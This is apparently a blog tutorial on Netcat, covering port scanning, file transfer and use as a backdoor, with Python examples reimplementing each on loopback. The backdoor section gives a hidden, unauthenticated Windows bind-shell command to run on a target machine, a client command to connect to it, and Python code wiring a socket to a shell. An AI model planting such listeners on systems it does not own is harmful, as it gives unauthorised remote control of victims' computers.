
Netcat and How to Harness its Power

The Basics

Netcat is an invaluable tool to many networking researchers, and for any power user or hacker it is a great tool to have. Netcat is, for lack of a better term, a "networking Swiss Army knife": it reads and writes raw TCP and UDP connections from the command line, so anything that talks over a socket can be driven by hand or scripted from a shell. It would be hard to sum up all of Netcat's uses in one post, but here are a few of them.

  • Port Scanner
  • Backdoor
  • File transfer (a raw TCP stream, not the FTP protocol)
  • HTTP Server/Client
  • Networked Hard Drive Backups
  • Chat Client/Server

I'm just going to touch briefly on many of these uses, but I'll go more in depth into some of the more security-related uses, such as backdooring and port scanning.

The not-Basics

WARNING: SHARKS AND OTHER NASTIES AHEAD. IF YOU'RE NOT AN EXPERIENCED NETWORKING PROFESSIONAL, YOU MAY BE EATEN ALIVE!

Port Scanning with Netcat

As any network security professional worth their salt knows, port scanning is a widespread, well-known technique that can be dangerous given the right tools and circumstances. Port scanning is essentially walking through a neighbourhood and knocking on people's doors until somebody responds, except that you learn who is home without ever being invited in. Do not mistake that for invisibility: a Netcat scan completes the full TCP handshake on every port it tries, so each knock lands in the target's connection logs, and a thousand of them in a row is exactly the pattern an IDS is built to flag. Port scanning can tell a criminal or an administrator a lot about a network and the computers on it, such as

  1. What services are running
  2. What services the computers on the network utilize
  3. If there is an active IDS or Firewall in place
  4. If there is adequate security and protection on a network
  5. and much, much more

Do not attempt to port scan any networks that you do not personally run or operate and know the laws of your local area before attempting any public Port Scanning adventures.

How to use Netcat as a Port Scanner

nc -v -w 1 -z www.example.com 1-1000

Not too complex a command. Let's break it down to see how you can use it as a more valuable tool:

"nc" – invokes Netcat
"-v" – makes the output more verbose: Netcat reports each port as it succeeds or is refused instead of staying silent
"-w 1" – sets a time-out of 1 second on each connection attempt; without it a port that a firewall silently drops can stall the scan for the operating system's full TCP connect time-out
"-z" – zero-I/O mode: Netcat connects and closes without sending any data, which is what turns it from a client into a scanner
"www.example.com" – the hostname or IP address of the target. It must be a bare hostname, not a URL; Netcat does not speak HTTP and will fail to resolve "http://www.example.com"
"1-1000" – the ports to scan, given after the host: a range like this, a single port, or a space-separated mix of both

Together these arguments cover most simple port-scanning situations. Because every probe completes the handshake, every open port you find is also a connection in the target's logs; Netcat trades stealth for being available almost everywhere.
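To make the three outcomes of a probe concrete, here is the scan above written out with plain Python sockets. This is an added example, not code from the original post: one connect attempt per port, nothing sent, and the result classified from how the connect ends, which is all "-z -w 1" does. The function names (scan_port, scan_ports, demo) are this example's own, and the demo runs only against 127.0.0.1 on ports it binds itself, so it touches no external host.

```python
import socket


def scan_port(host, port, timeout=1.0):
    """Probe one TCP port the way `nc -z -w <timeout>` does: attempt the
    three-way handshake, send nothing, close. Returns one of:

    'open'     - handshake completed (what nc reports as succeeded/open)
    'closed'   - the host answered the SYN with RST (connection refused)
    'filtered' - nothing came back within `timeout` seconds, the usual sign
                 of a firewall dropping the SYN; this is the case -w bounds
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))
        except socket.timeout:
            return "filtered"
        except ConnectionRefusedError:
            return "closed"
        return "open"


def scan_ports(host, ports, timeout=1.0):
    """Sequential scan of an iterable of ports, like `-z first-last`.
    Returns {port: state}."""
    return {port: scan_port(host, port, timeout) for port in ports}


def demo():
    """Self-contained run against 127.0.0.1 so nothing external is touched:
    one port we listen on ourselves (open) and one we bind and immediately
    release (closed). Returns (open_port, closed_port, results)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))        # port 0: the kernel picks a free port
    listener.listen(5)
    open_port = listener.getsockname()[1]

    spare = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    spare.bind(("127.0.0.1", 0))           # distinct from open_port: that one is still bound
    closed_port = spare.getsockname()[1]
    spare.close()                          # nothing listens on it any more

    try:
        results = scan_ports("127.0.0.1", [open_port, closed_port], timeout=1.0)
    finally:
        listener.close()
    return open_port, closed_port, results


if __name__ == "__main__":
    o, c, res = demo()
    for port, state in sorted(res.items()):
        print(f"127.0.0.1:{port} {state}")
```

The 'filtered' branch is the one worth remembering: a closed port answers instantly, an open port answers instantly, and only a silently dropping firewall makes you wait the whole time-out, which is why "-w 1" matters for a 1000-port range.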

Using Netcat as a Backdoor

Backdoors are the most basic form of RAT (Remote Access Tool). Installing a backdoor gives you access to someone's system from a remote location whenever you want, which makes them invaluable to black-hat hackers and even some system administrators. Depending on the scope of the backdoor you use, you will be able to control, monitor, modify and destroy the target's computer system. Backdooring someone's system is not an offence to be taken lightly, and you should never backdoor a system that is not your own.

How to use Netcat as a Backdoor Server

nc -L -d -p 666 -e cmd.exe

Not too complex a command. Let's break it down to see how you can use it as a more valuable tool:

"nc" – invokes Netcat (here the Windows build, nc.exe)

"-L" – "listen harder": keep listening and accept a new connection after the current one disconnects, instead of exiting after one session the way plain -l does

"-d" – detach from the console, so Netcat runs in the background with no window

"-p 666" – the local port the server listens on, in this case 666

"-e cmd.exe" – execute cmd.exe whenever someone connects, with the connection wired directly to the prompt's standard input and output

You must run this command on the target's system, and as you guessed you also have to drop or install nc.exe somewhere on the target; I will leave that subject for another guide/website to cover. Two things to know before relying on this: -L and -d exist only in the Windows port of the original Netcat, and -e is compiled out of many modern builds (the OpenBSD nc shipped on most Linux distributions, for example) precisely because of this use; and the listener asks for no password, so anyone who can reach port 666 gets the same shell you do, while a plain "netstat -ano" on the target shows it listening.

How to use Netcat as a Backdoor Client

nc -vv www.victim.com 666

Not too complex a command. Let's break it down to see how you can use it as a more valuable tool:

"nc" – invokes Netcat

"-vv" – tells Netcat to be really, really verbose

"www.victim.com" – the hostname or IP address (not a URL) of the machine that ran the server command

"666" – the port the server on that machine is listening on

Once you connect you should be given a shell on the target system to do whatever you want with. Some people bundle VNC servers with their RATs, or tools like wget to download files; it is all about personal preference or finesse.
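What "-e" actually does is small enough to write out, so here it is as an added example in Python (not code from the original post): a listener accepts one connection and starts a command whose standard input, output and error are the socket itself. The names (make_listener, serve_exec_once, demo), the use of /bin/sh as the command, and the kernel-chosen port are this example's assumptions; the demo binds to 127.0.0.1 only, connects to itself as the "client" side, sends one command line and returns what comes back. Note that nothing in it authenticates the caller, which is the whole problem with leaving such a listener on a machine.

```python
import socket
import subprocess
import threading


def make_listener(bind_host, port):
    """Equivalent of `-p PORT` plus listening: a bound, listening TCP socket."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_host, port))
    srv.listen(1)
    return srv


def serve_exec_once(listener, command):
    """The `-e` mechanism: accept one client and run `command` with the
    connected socket duplicated onto its stdin/stdout/stderr. No check of
    who connected is made. Returns the command's exit status."""
    conn, _peer = listener.accept()
    with conn:
        # subprocess dup2()s the socket's descriptor onto 0, 1 and 2 of the
        # child; from here on the remote end is typing into the shell.
        proc = subprocess.run(list(command), stdin=conn, stdout=conn, stderr=conn)
    return proc.returncode


def demo(command=("/bin/sh",), line=b"echo ok\n"):
    """Loopback-only round trip: start the listener on a free port, connect
    to it the way `nc -vv host port` would, send one command, collect the
    reply until the shell exits. Returns (reply_text, exit_status)."""
    listener = make_listener("127.0.0.1", 0)   # port 0: any free port, not 666
    port = listener.getsockname()[1]
    outcome = {}

    def server():
        outcome["status"] = serve_exec_once(listener, command)
        listener.close()

    worker = threading.Thread(target=server, daemon=True)
    worker.start()

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
        client.connect(("127.0.0.1", port))
        client.sendall(line)
        client.shutdown(socket.SHUT_WR)        # EOF for the shell, like Ctrl-D
        chunks = []
        while True:
            data = client.recv(4096)
            if not data:                       # shell exited, socket closed
                break
            chunks.append(data)
    worker.join(timeout=10)
    return b"".join(chunks).decode(), outcome.get("status")


if __name__ == "__main__":
    reply, status = demo()
    print(repr(reply), status)
```

Because the shell's descriptors are the socket, every command and every result crosses the network in the clear; the same property that makes this convenient makes it trivial to capture or hijack on the wire.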

Using Netcat as a File Transfer Server/Client

Using Netcat to move a file is pretty simple, though note that this is a raw TCP stream, not the FTP protocol: one computer listens and writes whatever arrives to a file, the other connects and streams the file in. I will go over the commands very briefly.

How to use Netcat as a File Transfer Client (the receiving side)

nc -l -p 1234 > TESTDOC.doc

Not too complex a command. Let's break it down to see how you can use it as a more valuable tool:

"nc" – invokes Netcat

"-l" – tells Netcat to listen for an incoming connection instead of making one

"-p 1234" – the port to listen on, in this case 1234 (traditional Netcat syntax; with the OpenBSD nc found on most Linux systems the port simply follows -l, as in "nc -l 1234")

">" – this is shell redirection, not a Netcat option: whatever Netcat would print (the bytes received) goes into the file instead of the terminal

"TESTDOC.doc" – the name to save the received file under

How to use Netcat as a File Transfer Server (the sending side)

nc -w 1 www.example.com 1234 < TESTDOC.doc

Not too complex a command. Let's break it down to see how you can use it as a more valuable tool:

"nc" – invokes Netcat

"-w 1" – wait at most 1 second for the connection and for any further network input once the file has been sent, then exit (without it some builds sit waiting for data the receiver will never send)

"www.example.com 1234" – the hostname (not a URL) and port of the receiving side, which must already be listening

"< TESTDOC.doc" – shell redirection again: the file becomes Netcat's standard input and is streamed to the receiver

Start the receiving side first. Nothing here is encrypted or authenticated: the file crosses the network in the clear, and whoever connects to port 1234 first is the one whose bytes land in TESTDOC.doc. Compare a checksum on both sides after the transfer (sha256sum on Linux), because Netcat will not tell you if the stream was cut short.
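The two commands above, receiver and sender, as an added example in Python (not code from the original post) so the stream semantics are visible: end of file on the sender becomes end of stream on the receiver, and the only way to know the copy is complete is to check it yourself, so the demo hashes both sides. The function names, the constructed payload, the temporary directory and the kernel-chosen loopback port are this example's assumptions.

```python
import hashlib
import os
import socket
import tempfile
import threading

# Constructed sample payload; stands in for TESTDOC.doc.
PAYLOAD = b"Constructed sample payload for the netcat transfer demo.\n" * 2000


def receive_file(listener, path):
    """`nc -l -p PORT > path`: accept one connection and write everything
    received to `path` until the sender closes its side. Returns bytes written."""
    conn, _peer = listener.accept()
    total = 0
    with conn, open(path, "wb") as out:
        while True:
            chunk = conn.recv(65536)
            if not chunk:            # sender shut down: that is the end of file
                break
            out.write(chunk)
            total += len(chunk)
    return total


def send_file(host, port, path, timeout=1.0):
    """`nc -w 1 host port < path`: connect, stream the file, then signal EOF
    by shutting down the write side. `timeout` bounds the connect and each
    blocking send, the role -w plays. Returns bytes sent."""
    with socket.create_connection((host, port), timeout=timeout) as conn, \
            open(path, "rb") as src:
        sent = 0
        while True:
            chunk = src.read(65536)
            if not chunk:
                break
            conn.sendall(chunk)
            sent += len(chunk)
        conn.shutdown(socket.SHUT_WR)
    return sent


def sha256_of(path):
    """The check Netcat does not do for you: digest of a file on disk."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def demo():
    """Round-trip PAYLOAD over 127.0.0.1 and compare digests.
    Returns (bytes_sent, bytes_received, sender_digest, receiver_digest)."""
    workdir = tempfile.mkdtemp()
    src = os.path.join(workdir, "TESTDOC.doc")
    dst = os.path.join(workdir, "received.doc")
    with open(src, "wb") as f:
        f.write(PAYLOAD)

    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))      # port 0: any free port, stands in for 1234
    listener.listen(1)
    port = listener.getsockname()[1]

    got = {}
    receiver = threading.Thread(
        target=lambda: got.update(n=receive_file(listener, dst)), daemon=True)
    receiver.start()                     # receiving side is started first
    sent = send_file("127.0.0.1", port, src, timeout=5.0)
    receiver.join(timeout=10)
    listener.close()
    return sent, got.get("n"), sha256_of(src), sha256_of(dst)


if __name__ == "__main__":
    sent, received, h_src, h_dst = demo()
    print(sent, received, "match" if h_src == h_dst else "MISMATCH")
```

If the sender dies halfway, receive_file still returns cleanly with a short file and no error, exactly as "nc -l" would; only the digest comparison catches it.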


Conclusion

The scope of what Netcat can be used for really depends on the user, and new people find new uses all the time. If you are interested in any more facets of using Netcat, feel free to contact me or visit Netcat's man page.

One Comment
  1. Hey Ian, Just wanted to say nice job on this article/guide. In depth yet still understandable by those just starting out. I look forward to reading more.

    August 30, 2011
